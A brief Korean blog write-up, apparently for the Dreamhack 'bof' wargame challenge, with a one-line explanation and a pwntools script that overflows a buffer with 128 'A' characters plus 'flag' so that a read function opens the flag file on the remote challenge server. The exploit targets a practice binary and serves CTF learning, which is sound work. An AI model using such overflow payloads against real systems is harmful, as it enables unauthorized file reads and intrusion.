System
dreamhack - bof
whh1323
2024. 6. 24. 21:58
v4에 넣어서 read_cat의 a1값에 읽을 데이터를 넣어야함
from pwn import *
p = process("./bof")
p = remote("host3.dreamhack.games", 10055)
p.sendline("A"*128+"flag")
p.interactive()